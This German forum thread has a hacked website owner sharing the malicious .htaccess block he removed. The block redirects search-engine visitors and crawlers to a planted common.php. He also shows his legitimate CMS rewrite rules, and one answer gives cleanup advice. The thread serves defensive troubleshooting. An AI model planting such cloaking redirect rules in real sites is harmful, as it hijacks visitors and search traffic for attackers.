Mögliches Duplikat:
Mein Server wurde NOTFALL gehackt
Meine Website wurde kürzlich gehackt. Ich glaube, ich habe den Code gefunden, der der htaccess-Datei hinzugefügt wurde, habe ihn gelöscht und dann ein Skript hinzugefügt, um zu verhindern, dass erneut auf die htaccess-Datei zugegriffen wird. Ich habe auch die PHP-Datei gelöscht, auf die sich der gehackte Code bezieht (common.php). Was muss ich als nächstes tun? Ich bin kein Programmierer oder Website-Entwickler, aber ich wollte unbedingt sehen, ob ich das Problem selbst beheben kann, da ich einige Stunden damit verbracht habe, es zu versuchen, und nicht so schnell aufgebe.
Hier ist der gehackte Code, den ich gelöscht habe:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (shtml|html|htm|php|xml|phtml|asp|aspx)$ [NC]
RewriteCond %{REQUEST_FILENAME} !common.php
RewriteCond /home/httpd/vhosts/bluestardive.com/httpdocs/common.php -f
RewriteRule ^.*$ /common.php [L]
</IfModule>
dieser Code muss in der htaccess-Datei bleiben, da er meine URL auf SEO-freundliche umleitet oder Website-Fehler verursacht, aber wurde dieser Code auch gehackt?
# Apache search queries statistic module
RewriteEngine On
AddHandler php5-fastcgi .php .php5
# <contrexx>
# <core_modules__alias>
RewriteRule ^about-us$ /index.php?page=883 [L,NC]
RewriteRule ^ausfluge-und-aktivitaten$ /index.php?page=800 [L,NC]
RewriteRule ^bluestardive-news$ /index.php?page=919 [L,NC]
RewriteRule ^bookings$ /index.php?page=911 [L,NC]
RewriteRule ^diveresort$ /index.php?page=879 [L,NC]
RewriteRule ^diving$ /index.php?page=880 [L,NC]
RewriteRule ^excursions-and-activities$ /index.php?page=881 [L,NC]
RewriteRule ^galerie$ /index.php?section=gallery [L,NC]
RewriteRule ^oceannight$ http://www.bluestardive.com/index.php?page=906 [L,NC]
RewriteRule ^philosophy$ /index.php?page=846 [L,NC]
RewriteRule ^reservation$ /index.php?page=917 [L,NC]
RewriteRule ^reservierung$ /index.php?page=918 [L,NC]
RewriteRule ^resort$ /index.php?page=798 [L,NC]
# </core_modules__alias>
# </contrexx>
Antwort1
Das Beste, was Sie in solchen Situationen tun können, ist, den Einstiegspunkt des Benutzers zu ermitteln und den Angriff zu duplizieren. Ich kann Ihnen nicht sagen, ob der .htaccess-Datei irgendetwas Verdächtiges hinzugefügt wurde, da ich keine Ahnung habe, was sich in index.php befindet.
Wenn index.php die Daten direkt aus der Datenbank wiedergibt, ist es möglich, dass er/sie schädlichen Code in die Datenbank eingefügt hat oder in anderen Dateien neue Einstiegspunkte (PHP-Shells, Schwachstellen) erstellt hat.
Ich empfehle Ihnen dringend, mit einem Sicherheitsexperten zu sprechen. Wenn nicht, überprüfen Sie jede Datei auf Ihrem Server noch einmal gründlich, einschließlich der Datenbankeinträge.
Stellen Sie sicher, dass Sie auch seinen Einstiegspunkt herausfinden, um zukünftige Angriffe zu verhindern. Wenn Sie weitere Informationen benötigen, können Sie mich jederzeit kontaktieren.